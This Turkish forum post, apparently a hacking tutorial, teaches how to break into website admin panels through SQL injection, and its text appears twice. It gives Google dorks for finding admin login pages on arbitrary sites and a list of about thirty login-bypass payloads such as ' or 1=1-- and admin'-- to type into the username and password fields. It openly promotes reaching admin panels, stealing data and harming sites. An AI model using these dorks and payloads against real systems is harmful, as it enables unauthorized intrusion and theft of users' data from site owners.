ESENLİKLER BEN İMAM DOĞAN
Bugun siteler nasil bypass edilir? nasil hacklenir ve login geçilir
onu anlatacağim o zaman başlayalim iyi seyirler...
Dostlar login bypass bir tur açik tutudur ornek sonunda ?php=7 gibi olan sql açiklarinda bulunmasi
gayet muhtemeldir bu açikla login geçip admin paneline ulaşilabilir
leak edilip datalar çalinabilir ve siteye zarar vericek her turlu şey yapilabilir
Pekiii şimdi nasil tesğit edeceğiz bunun için tabiki google dorks kullanacağiz
ornek dorklar aşşağida
Evet dorkumuzu yazdik çikan sonuçlara bakalim şimdi
Bakin bir suru admin paneli çikti
Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.
Seçtiğim panel bu
username ve password kısmına denenecek kodlar
Şimdi dostlar kodumuzu yazdik ve admin paneline geçtik
Burdan kod ile email verilerini çekebiliriz eski bi yontemdir çok işe yaramaz ama sql e giriş olarak
onemli seviyededir ben test sitesinde denedim o yuzden email verileri
bu şekilde çikti
KONUDA EKSİK KİSİMLARİ İLETİRSENİZ MUTLU OLURUM ESENLİKLER!
Bugun siteler nasil bypass edilir? nasil hacklenir ve login geçilir
onu anlatacağim o zaman başlayalim iyi seyirler...
Dostlar login bypass bir tur açik tutudur ornek sonunda ?php=7 gibi olan sql açiklarinda bulunmasi
gayet muhtemeldir bu açikla login geçip admin paneline ulaşilabilir
leak edilip datalar çalinabilir ve siteye zarar vericek her turlu şey yapilabilir
Pekiii şimdi nasil tesğit edeceğiz bunun için tabiki google dorks kullanacağiz
ornek dorklar aşşağida
[CODE]inurl:admin.php?id=inurl:/admin/login.php[/CODE]Evet dorkumuzu yazdik çikan sonuçlara bakalim şimdi
Bakin bir suru admin paneli çikti
Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.
Seçtiğim panel bu
username ve password kısmına denenecek kodlar
''Or'='Or''<br>anything' OR 'x'='x<br>1'or'1'='1<br>' or 1=1 or ''='<br>" or 1=1 or ""="<br>' OR ''='<br>'' OR ''=''<br>'OR''='<br>hey' or 1=1–<br>''Or 1 = 1'<br>' or 1=1--<br>or 1=1--<br>" or 1=1--<br>or 1=1--<br>' or 'a'='a<br>" or "a"="a<br>') or ('a'='a<br>hi") or ("a"="a<br>'hi' or 'x'='x';<br>x' or 1=1 or 'x'='y<br>\x27\x4F\x52 SELECT *<br>\x27\x6F\x72 SELECT *<br>'or select *<br>admin'--<br>")) or (("x"))=(("x<br>" or ""+"<br>admin"or 1=1 or ""="<br>admin") or ("1"="1"--Şimdi dostlar kodumuzu yazdik ve admin paneline geçtik
Burdan kod ile email verilerini çekebiliriz eski bi yontemdir çok işe yaramaz ama sql e giriş olarak
onemli seviyededir ben test sitesinde denedim o yuzden email verileri
bu şekilde çikti
KONUDA EKSİK KİSİMLARİ İLETİRSENİZ MUTLU OLURUM ESENLİKLER!
